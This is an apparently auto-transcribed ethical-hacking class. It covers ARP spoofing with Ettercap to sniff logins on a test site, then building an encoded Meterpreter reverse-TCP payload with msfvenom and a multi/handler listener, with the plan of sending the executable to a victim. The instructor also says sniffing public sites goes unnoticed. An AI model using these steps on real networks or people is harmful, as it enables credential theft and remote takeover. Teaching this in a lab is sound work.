Hello everyone, good evening, welcome back. Hope you all are doing good. Just give me a minute, I will share my screen and then we can get started. Okay, hope you can see my screen and I'm audible. So I'll just keep this thing running in the background. Meantime, I've got a new topic for you. Right, so we have discussed a little bit about previously about keyloggers we saw, right? And then okay, all these basics were done. So there is something which we need to know in here, right? So something about a tool called as EtherCap. Right, so what exactly is this tool? EtherCap, we will just see. It's a free and open source network security tool for something called as a man in the middle attack. Okay, so a man in the middle attack, which is performed via a LAN, right, on a local network. Right, so this tool can be used for computer network protocol analysis and for security auditing. Right, so first we need to understand what exactly is this man in the middle attack. So it's like, consider you have got two connections, right? So it's like one end is the user and the other end is the web application, right? So this is a source to the destination. Now what exactly is this man in the middle attack? How do you connect from the source to destination, say via the internet you're trying to connect, or via a router or via a hotspot you're trying to connect from the user to the server or something, right? So there is the original connection. Now what happens in the man in the middle attack is that there is in between a new connection which is coming, right? So it's like man in the middle, right? So there is a hacker or a person coming in between and trying to access your data, right? So this is called as a man in the middle attack. Okay, so victim A, victim B, you will have a normal connection or a normal communication, wherein in between a person comes, a man in the middle comes, and then it immediately gets disturbed, right? The flow gets disturbed. So this communication is called as spoofed, SPOOFED, spoofed connections or spoofed communications, right? That is what is man in the middle attack. And you can actually call these as very serious call this as a very serious cybersecurity issue, right? When uh, the common uses of this, or commonly where it is done, is that especially in this IoT field, where attackers use this data to break into networks and then intercept the data. Okay, it causes problems for companies as well as individual users also, right? So we need to understand, have an understanding prior as to what are these kind of attacks, right? So we need to know what is a man in the middle attack, so that we can test out all the vulnerabilities and then make sure that those don't occur, right? So here what happens, a malicious actor or a hacker secretly connects and tries to alter the communications between the two parties, a victim A and a victim B, right? So what happens in this, the most common consequence in this man in the middle attack is money theft, right? So you can have this thing like, if I am sharing a password, a very confidential password from me to a friend of mine, and then if a third person is intercepting that, and then if they come to know about all the details of which say probably like a bank's account number with the PIN or the password, right? So if it comes to know, if that person comes to know, then money theft is very common, right? So there was like around 49-50 suspects for different European countries on huge man in the middle attacks, right? Not it is not like a small amount, it's like huge things were happening. And every year a lot of these things keep happening, these scams, and then you will have these cyber crimes which keep happening. So what you need to do is, for fixing up this thing, how to avoid this, you have to search for all the vulnerabilities which are there, what are all the viruses, what all malwares are there, and then you have to fix those vulnerabilities in the softwares and the networks. If there is any risk, if there is any vulnerability which you think is there, right? So you need to keep testing, keep updating every time, and then just fix those things so that you are not susceptible to man in the middle attack. So EtherCap is a tool which actually does a similar kind of a thing. It performs a MITM attack, right? So it can run on various Unix-based operating systems like Linux, Mac OS, Solaris, Windows. Right? EtherCap can sniff with network traffic. It can capture passwords as well. Right? So we'll see its practical use of what this EtherCap does. Right? And then in the next slide, right, so we'll actually see a little bit about what is this concept of ARP poisoning, right? So there is something called as ARP poisoning or ARP spoofing. Okay, here, right? So ARP means address resolution protocol, right? So this is ARP. ARP poisoning is done, right? So it's like in networking, ARP spoofing or ARP cache poisoning is a technique by which an attacker sends a ARP protocols, ARP message onto a local area network, right? So how does this thing work? Right, so here it is when an attacker sends a false message. Okay, it's not a genuine message, a false message to a attacker, sorry, to a victim. An attacker sends a false ARP message over the LAN network to a victim, right, with the IP address of a legitimate computer or the legitimate server, right? So it's like what happens here, we'll just see. This is the system A. This is the IP address, okay? And I want to connect to this server. So generally, this is the medium which I use. So what happens in this is there is this ethical hacker, okay? Or an evil hacker, which is that. So this guy, what he does is he connects to the system A. So now B is connected to A, or B is just coming in between A, and B is replicating itself or acting or showing itself as a router which was supposed to be there here in between. So instead of this thing where you have got this green color line means we'll just consider that this is the actual router, so that this A has to connect to this router to access the data from the server and then get a response back. So what this B does is, instead of being here, it is going to replicate itself and then put it here, so that this A is going to connect to this B, and then instead of accessing the data, now the data also passes through B, right? So this is the ARP poisoning method which is going to happen, right? So a falsified ARP message over a LAN network is used or sent to link an attacker's MAC address with the IP address of a legitimate computer or server on the network. Now, once this attacker's MAC address is linked to an authentic IP address, the attacker can receive any messages directed to that particular MAC address. So it's like once you've got access, this attacker can intercept, they can modify, they can block all the communications which is there to the system A via the IP address which it has got. Right? So it can block any communications to that MAC address device, right? So if you take a system, it's going to consider that system's MAC address, and on that it is going to do this poisoning. Okay. So basically sends the ARP bits or the ARP messages which are not true, falsified ARP messages are sent. Okay. And this data is saved as ARP cache. Okay. So address resolution protocol, how to view this ARP cache which is sent, right? So in the ARP, if you just type IP config, right, so you get this IP address and then the default gateway, right? So if you wanted to view the ARP cache, just give ARP-A, as it will give you the IP address, it will give you the MAC address, and then you can actually find this. Okay. So how do we see this? What is the working for this EtherCap? Right, so we will follow all of these steps. In fact, I'm gonna share this thing with you. Right, so okay, this was the slide for ARP, how to view the ARP cache for Windows, as well as I think this was for Linux here. Okay, so what all steps are we going to deal with when I speak about EtherCap? Okay, there is one more thing. This was ARP spoofing, right? ARP spoofing. There is one more thing called as a MAC spoof. MAC spoofing is like a technique for changing the MAC address of the NIC card or MAC address of the system. Okay. Fine. Now, just to see how this EtherCap works, we will do it on Kali itself because it's already a pre-installed tool which is available on Kali. Just let me go here, Kali. Just a minute. Okay, okay. EBOM is not giving option for custom text. XLR8 is giving, what is this XLR8? But it is asking passcode. No, TBOM should give you an option. What custom text you mean? You wanted an SMS, right? SMS works. We did see that SMS indeed works. Yeah. So here just search for EtherCap. There are two options. Right, one is EtherCap, one is EtherCap graphical tool. These are all default applications in the Kali Linux. Right, so we will use the graphical tool. Right, in this graphical tool, first thing what I will do is I'll just go to the terminal and then give sudo apt-get update EtherCap. Oh, okay. Fine. We had to just give apt-get update separately. Okay, not required. We'll just exit without it. So here I will search for EtherCap. So it's a graphical thing and it requires authentication. So just log in. So I'm giving it all the authentication. So this is my EtherCap graphical tool, right? So it says setup sniffing at startup. What is the primary interface? Right, so this is the internet interface which is directly connected via the LAN. So the primary interface is ETH0, right? And then is there any bridge sniffing required? You can enable it, but not required. We don't have anything connected. We don't have any external device connected for the network. So this is sufficient. This will work for us right now. Right, so I'm just gonna keep it at the default, whatever was there. Okay. So here there are a few options. right? So I just gave an OK, and then here it started giving me some details, telling that listening on Ethernet port, SSL dissection needs a valid rate command script in the iter.conf file might not have worked correctly, right? And then it says there are 34 plugins, 42 protocols, 57 ports, so many OS fingerprint, Mac fingerprint, known sources. No scripts were specified. Started unified sniffing. So here I'll just click on stop. I don't really want it to sniff yet. So there are three menus. One is the host list, one is the scan, one is the start or stop. Then this is the MITM menu. If I wanted to do man in the middle attack, there are so many options which we can select. Right? And then just clicking on stop MITM. Right? So this is the ettercap menu wherein you can select the targets, you can select the hosts, right? And then you can actually view filters, logging, and plugins. Okay. So for now, for us, what all things are required? There are so many options which you can explore in this ettercap. Right, so we have just selected the internet connection type initially, that is ETH0. Right, so in this ettercap menu, I have to go to host. Right, so in the top right corner, let me just go and search for, okay, these three dots, host, right, and then I will click on scan for host. Right, so it's scanning for the whole net mask for 255 hosts. Three hosts were added to the list. Okay, once it says that three hosts were added to the list, right, so I just need to go to host and then click on host list, hosts, and then click on host list. So I've now got three different networks. Okay, displays all the IPs, select whichever we wanted. Say if I wanted this one 10.0.2.4, right, so just right click and then click on add to target one. As I'm just giving host 10.0.2.4 is added to target one. At first, let me just see what is the status which we get in ifconfig. Right, so here the connection is showing 10.0.2.15 is there inside it. So I'm just using this IP address. Actually, it is like I have connected over the NAT network, I guess. That is why this 10.0 is being shown in here. Instead, it should have been in bridge adapter, and then I was supposed to be in that 192.168 part. Okay, so let's close this and then reopen it again once this has changed ifconfig. Okay, now it is in 192.168.1.44. I just search for ettercap and then ettercap graphical. Okay, so the primary interface is ETH0 connected. Just give an OK. Then go to this ettercap menu, go to host list. Nothing is there, so just click on host and then click on scan for hosts. Okay, not exactly, you need not have a Wi-Fi network adapter, does work even without that. So I'm just gonna select this one 1.52, add to target one. Right, so once I do this, I will just go to the MITM menu and select ARP poisoning to sniff the remote connections. It says for host added, just see the one which is similar in your IP address. Okay, just going to MITM menu, I will select the ARP poisoning and sniff remote connections. Okay, just click on OK. Right, so once sniff remote connection is enabled, we have selected this option, right, and then I think I clicked on sniff. Okay, so now that I've gone to this ARP poisoning sniff remote connection, I've selected this. Now I have to go to sniff and then it should start sniffing, right? So once this thing has started sniffing, open any website in the target computer. Okay, so first we will see if this is for CMD, right? What is in the IP config, right? So 192.168.1.52 is my system's IP address, which I have sniffed that. Okay, so I'm just gonna open up a browser, right? And then I will just write in the URL, right? HTTP is to okay. So in this test website, I'm actually going to open, and here it is like Acunetics, Acuart, some test website which is available, right? So here, let me just give the username and password and press enter. Right, so you can see here as soon as I did that in the ARP poisoning and I had enabled that for sniffing, right? And this, whenever I gave this, it opened that URL and the username was this. This was the password. It was successfully able to sniff the username and password by using this ARP poisoning method. Right, so here we can track the username, we can track the password. Okay, and you can just see one more thing, I guess, right? So if I just open up CMD, right? So I'll just give FTP, say FTP McAfee.com. Right, so I'm not sure if it works. Just a minute. Right, so inside this FTP, it should actually ask my username. Okay, fine. So it says okay, unknown host. Fine, there is something in this. So okay, you have understood what we did in this part, right? So we went to this login page, whatever username and password we got. So it sniffed from the IP address of that and then it extracted and then gave it to me in here, correct? So this is what happened in your EtherCap, right? So this is how your ARP poisoning works, right? So it's like we're not allowing it to go directly and reach the user, right? So we're not allowing that website to load, right? So in normal case, how would it be? It'll be the other way, that website would load properly, but here instead of that you're connected to some other device. So now I've got the username and password. Okay, fine. So this is how your EtherCap works graphically, the graphical EtherCap. Okay, yeah, it says 4 hosts added. Okay, yeah, I will share you the website. Okay, the website for this is basically testphp.vulnerableWebApplications.com/ login.php. Control V, send to all. Okay, yeah, so that was about your EtherCap. Just give me a minute, we'll just see what exactly is the next thing. Okay, these steps is it for Ettercap? Fine. So you just go to Kali, click on Ettercap. Then while setting up, you just have to turn on the ETH, right? And then give OK. Top right corner, there is a menu wherein you have to scan for hosts, right? Once you scan for host, you get the host list, right? So it'll display all the IPs, select which is the IP for our system, and then you'll have a default gateway, right? And then for that, you can just click on add to target 1 or target 2. You have got a MITM attack or a MITM menu, right? Just open that MITM menu. There you will have ARP poisoning as one of the options. In ARP poisoning, just select sniff remote connection. Okay, so once this option is selected, start sniffing button on the top left, right? So once this is done, just open any website on the target computer like these. Okay, not literally any website, right? So it's like test php dot vulnerable.com login.php. We can track the username and then the password. Okay, so these are a few steps. Now to just do this again here. Right, so from here we get started, I guess. Let's just give a OK. And then search for your host. So here it already starts sniffing. So first you need to search for your host. Scan for host. Okay. So host list is now all of these things. We know that this is the thing for our Windows, right? So once I do this, I've got all the values. I will just add this to target. Right, and then I will just do the MITM menu wherein you can select the ARP poisoning and then click on sniff remote. Right, so let me just go here to the MITM menu, ARP poisoning, and then sniff remote connections. Okay, right, so it's gonna sniff all of these things. Then you can just open up the browser on the victim's system, and then you can start sniffing. Open any website like this test PHP is one such example. Right, so in here, whatever thing you type, you're going to get that. Okay. Right, so I'm just giving something here, also something here. Right, so you can see here the username as well as the password. Okay, so this is how you work with Ettercap for ARP poisoning. Just a second. Okay. So the things about this Ettercap is that this Ettercap is going to work only when you've got your insecure websites, right? So it's like this MITM can be done only on the insecure connections over HTTP, nothing on the HTTPS part, right? So right now, most of them are on HTTPS, so the MITM is not possible. because you will have the SSL encryption and the TLS encryption for the HTTPS secure sites. Okay, so any HTTP website and there is a form there, it can work, and any HTTPS is there, and then there is a form there. This is not quite used because there is no MITM happening there at all. And if in that case there is someone who is able to breach into that encryption, then yes, it is gonna work. The same tool is gonna work. Okay. Yeah, Harsh, it doesn't work only for this one tool. Any HTTP tool, it's gonna work. Okay. Okay, so next what we will discuss is something as to how to do hacking on Windows. Like if I wanted complete access, I think there was someone who asked yesterday, what if we wanted to get the complete screenshot of a system? Correct? We will use something called as Metasploit. Yeah. So there's something called as Metasploit which we'll be discussing. Right. So Metasploit is a tool which is already there in Kali again. Right. So we do this. We've got something called as penetration testing, also called as pen testing. Right. So it's actually a form of ethical hacking. So here we are trying to exploit some vulnerabilities and checking for some exploitable vulnerabilities. Right, in Metasploit you've got a lot of examples for such a thing. Right, so it's actually a simulated cyber attack, this penetration testing. Right, so against your computer to check for exploitable vulnerabilities. Okay, so in the context of web application security, it's a very commonly used thing, pen testing. Okay, so here you can actually breach any number of application systems. Right, you can log into servers, you can break into front end and back end servers for detecting any vulnerabilities. Okay, to see if there is some code which is injected. Okay, if we do just a sec. If we do this to any public website, will the target be able to understand that we are sniffing? No. Once you just get this access, there is no way that I will understand that something is being done, because you will do it by using the IP address, right? So there's nothing which I can help in that. This tool helpful for collecting digital evidence for an investigation. Yes, if you are getting the information, yes, you can this use if the site on which the person is working, and then you want to collect some evidence. Right? So if this is able to collect the data from that site, definitely you can use it as a digital evidence. Right, so I was just speaking about penetration testing. Right, so what happens in penetration testing or in pen testing? Right, so it actually involves the attempted breach of any number of application systems. Right, so there are like various stages. Right, so first stage is like the planning and reconnaissance. Then you have got scanning, right, as to the tools to understand how the target responds to any intrusions. Right, so gaining access, wherein web application attacks are staged to uncover a target's vulnerabilities. Then finally you have got the maintaining access, like if there is a vulnerability, you have to see how to overcome that, how to overcome the risk and everything in that, right? So that is what you do in penetration testing. Okay, so how do we start is that we've got a tool called as Metasploit. Right, so I think you can just search for it here. And so there is something called as a Metasploit framework which we will be using. right? In this, what we can do, starting database. Okay, I think you've got something like this. It should say starting or creating the Metasploit framework console. Sorry, starting the Metasploit framework console is what you get. Okay. Asking for password, you can just give your Kali as the password. Then maybe you have changed the password, Arvind. Okay, you can see I can just show it to you again. In here, let's see if it asks me the password. So there is this thing called as Metasploit framework. Sudo password. Yes, okay. I just give enter. Already started, appears to be already configured. It initializes. If not, so it is now skipping all the initialization steps. So directly it should give me the thing related to it. Right. So starting the Metasploit framework console. Right. So now we have got all of these things. Now in Metasploit, there are a lot of things, right? So first thing is you have got a lot of exploits which you can use, right? So what are these exploits, right? It's a tool designed to take advantage of a flaw inside a computer system, like basically for installing a malware or something, correct? So what is the type of an exploit? Let's say you've got like so many things in the exploits, right? There are various types of exploits which you can have, right? So if I just show you exploits, here it means that you're basically allowing the administrator privileges, right? So you're actually giving it, or exploits allow an intruder to remotely access a network and then gain the elevated privileges. Okay, that is what is an exploit. And the files which have got all of these exploits, right? So you put something called as payloads, right? So what are these payloads? Payload is a exploit module, right? It's like there are different types of payloads which you have got for Metasploit. So what do payloads do? They create a listener and a connect port, right? So it's like it is establishes a connection to the target service, and then there are various types of payloads, right? There are like three different types of payloads, and then a payload means Metasploit creates a listener on the corrector or the connect port. Okay, this is only when this payload is executed. Now payload contains all of your files, all of the malwares which you want to create, or the exe file or any sort of file which you want to put it on your victim system, right? So the payload contains the exploit, and then for creating these exploits you use something called as encoders. Okay, so we've got a encoder which we will use. We've got a payload. We have to select the type of payload which we are going to create. The name of the exploit also we have to give, right? So this is something how you create a file by using Metasploit. Okay, so now just to say get started with how to send this thing on a Windows thing. Right, so I'll just open up a terminal, a new terminal. Here I will just give MSF Venom, right, and then give -a x86 architecture I'm going to consider. Then I will just take the platform as Windows, right, and then I will have to give a -p, right. So this is the payload which we are going to use. So we are going to use a Windows. There is something called as a meterpreter, right, and then we are going to use a reverse TCP connection, right, and then you also have got this lhost or okay. So here in this lhost, right, this local host means that what is the IP address of this current system which we are trying to access. The host of this system is the lhost. Let's just by giving ifconfig close. Okay, just set the lhost to this thing, and then we are going to set the L port to a default, right? So we are going to set it to a default of L port equals to say 4444, and then we are going to use a binary encoder, right? So just giving a /x00 and then run a executable, right? So here we are using an encoder called as x86 slash. It's actually there was no slash here. So x86 slash Shikata GANAI is the name of a person who created this encoder, right? So we've got this encoder as a result of this. So this encoder, and then we are asking it to go ahead with 3 iterations or 3 loops, and then the file name is going to be say output, okay, dot exe. Just press enter. Okay, so it's giving me all of these details, and then it gave me so many options, right? Let me just go here. Okay, what did it say? It says invalid format. Is it okay? So I think I had to mention that this was supposed to be a exe file. So first I will just mention here that this is an exe file, and then for the output name you just give this thing. Hopefully now it's gonna take my request. Right, so we'll just wait for a little time because it has to create this payload. Okay, one or more options fail to validate. Right, so probably again there is this mistake of the port. And actually for the host and port You have to just keep it like this. Okay, so you can see here that now it has created this file. So we use the msf venom command, and after using that, we use the architecture x86, we use the platform Windows. The payload was supposed to be from a Windows Meterpreter reverse TCP connection, right? And then we are selecting the L host as 192.168.1.44. This is L host, this is L port, and we're setting this for the binary encoder, and then this is the encoder's name, Shikata GANAI. We've given 3 iterations, then we have given the file name to be a .exe, and after that we're just mentioning that, okay, for the output file name, this is what you have to do, correct? So we've got all of these things, and finally I've got the file. Now this file, I actually need to share this file, right? So I can use any technique to just share this file. So just giving ls. Right, so I've got this file as output.exe, right? So I can just give move output.exe, right? So just move it to desktop. ls, sorry, okay. I've got this file here on the desktop. Now cd desktop ls. Right, so here I've got the output.exe file. Now this file needs to be shared with the victim. Right, so how can I share it? I will just open up a link, and then from that I will share this file. Or I'll just do one thing, since this is my victim system, right? So I'll just try to drag and drop it here. From here to here, let me just see if it is working for this drag and drop. I doubt if it's gonna work. Okay, it says receiving and dropping data. Okay, drag and drop operation from guest to host failed. Okay. So I think in the settings, we have to just enable this advanced. Yeah, there is a drag and drop bidirectional option. Still don't know why it failed. So what I will do is I will just go to Mozilla Firefox. There is something called as vTransfer, which we will use for creating a link. Right, so I'm just trying to share this thing. Right, in the meantime, and I'll tell you what you need to do. Right, I don't think we'll be able to finish this off. So in the meantime, you have to open up a new MSF console window. Right, so once you open up a new MSF console, like it's from terminal, you just went to this MSF console. Now I will just give use, and then I will use the exploit multi handler. Right, so this handler is used to catch the exception. And so I'll just use the exploit multi handler. It is configured with the payload generic shell reverse TCP. If you remember, our payload is reverse TCP. The same thing is there here. So I have to set the payload to Windows Meterpreter slash reverse TCP, and then I need to set the L host to this thing, set the L port to 4444, right? So if I just give something like show options, I've set the port, I've set the host. I also have to set this payload and then use the exploit multi-handler. Now, if I click on show options, it is going to tell me that yes, I've set the local host as this, I've set the local port as this. This is the listen address. This is the listen port. Okay. Right. So after this, I just have to click on exploit. It'll give me started a reverse TCP handler on this thing. Okay. Now what you need to do is just share that file. It needs to be gone on say the victim system. Okay. Right. So in this WeTransfer, we can actually send the files. Right. So you can upload a file here and then send a file output.exe. Right. You can actually get a link and then send a file. Open it there. Just run the file and then you will actually get access here. Right. So that part we'll do later. So I just want you all to note down this thing that once you open up the MSF console, just give use exploit multi-handler. Next step is to set the payload as Windows Metapreter reverse TCP. Next is to set the port, set the host, and then click on show options just to confirm that both of these things have been added, and then just click on exploit. Okay, right, so this is how your Metasploit works. I'll just give you a recap in the next session. Till now, any questions in here? Any doubts? I'll just give you a recap and then show you how this thing works in the next session. Yeah, can you show that command once again? Sugosha, got it, or you want me to show it again? Okay, I think I already shut it down. Yeah, got it. Okay. Right, so I think we'll end the session here then. Thank you all. I'll see you in the next session, that is tomorrow, and this timings is like slightly different. Right, what is the timings you have got according to tomorrow's session? Just a second, I will have to check my schedule as well. Right, so tomorrow is 24th. It is from 8 to 9:30. Okay, slight timing difference. Today it was 6:30 to 7:30 only. Tomorrow 8 to 9:30. Then one last session we've got from 6 to 7 on Saturday. Okay, so tomorrow we'll continue with the rest of the things. We've got 1.5 hours tomorrow. Okay. I gave localhost to your IP. Okay. Yes, Harsh, because you have to give your own IP address. That's why it doesn't really give you, I guess. That is why I didn't get the output file. In fact, it will show you that there was some IP error. In case the victim reconnects to the network, his IP might change. So do we check his IP again? Siddhant, this IP address is not the victim's. It is your own IP address which you are entering here, right? So this is the local host. L host and L port is your own system. Like if I'm doing it on my Kali Linux, I have to give my details here. It is nothing with respect to the victim yet. Victim is just sending the file. We don't do any other thing with respect to his IP. Then later on we can extract his IP. Okay. Exam, how are they gonna conduct, like MCQ or practical? Gaurav, I think I had given you a number yesterday. Anything related to the exam patterns and other things, you have to contact sir, or on your group. Sir is already there. You please check with sir for that. Okay, I'll end the session then. Thank you all. See you tomorrow.